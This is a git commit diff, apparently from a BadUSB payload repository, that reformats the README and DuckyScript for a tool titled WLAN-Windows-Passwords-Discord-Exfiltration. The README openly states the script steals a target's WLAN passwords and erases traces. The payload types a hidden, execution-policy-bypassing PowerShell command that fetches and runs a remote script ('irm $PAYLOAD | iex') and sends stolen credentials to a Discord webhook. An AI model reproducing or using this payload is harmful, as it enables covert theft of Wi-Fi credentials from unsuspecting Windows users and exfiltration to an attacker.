pull/629/head
Aleff 2024-06-11 09:24:02 +02:00
parent e8e141ae97
commit d5185ed116
2 changed files with 20 additions and 26 deletions

View File

@ -1,4 +1,4 @@
# WLAN Windows Password - BADUSB ✅
# WLAN Windows Password
A script used to stole target WLAN Passwords.
@ -27,7 +27,7 @@ Then it cleans up traces of what you have done after.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<h2 align="center">Aleff</h2>
<div align=center>
<table>
<tr>
@ -37,17 +37,11 @@ Then it cleans up traces of what you have done after.
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
</a>
<br>Instagram
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Discord
<br>LinkedIn
</td>
</tr>
</table>

View File

@ -1,24 +1,24 @@
* ###################################################################
* # #
* # Title : WLAN-Windows-Passwords-Discord-Exfiltration #
* # Author : Aleff #
* # Description: A script used to stole target WLAN Passwords. #
* # Category : Credentials #
* # Target : Windows 10-11 #
* # Version : 1.0 #
* # #
* ###################################################################
###################################################################
# #
# Title : WLAN-Windows-Passwords-Discord-Exfiltration #
# Author : Aleff #
# Description: A script used to stole target WLAN Passwords. #
# Category : Credentials #
# Target : Windows 10-11 #
# Version : 1.0 #
# #
###################################################################
ATTACKMODE HID
# VARIABLES
# - Provide Discord Webhook
DISCORD_WEBHOOK='https://discordapp.com/api/webhooks/<webhook_id>/<token>'
# - Replace example.com with your own link. The Payload should be Windows-Passwords.ps1
PAYLOAD='example.com'
QUACK DELAY 2000
QUACK GUI r
QUACK DELAY 250
QUACK STRING powershell -w h -ep bypass $discord='
# REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
QUACK STRING DISCORD
# Reply example.com with YOUR LINK. The Payload should be Windows-Passwords.ps1
QUACK STRING ';irm PAYLOAD | iex
QUACK STRING powershell -w h -ep bypass \$discord='$DISCORD_WEBHOOK';irm $PAYLOAD | iex
QUACK ENTER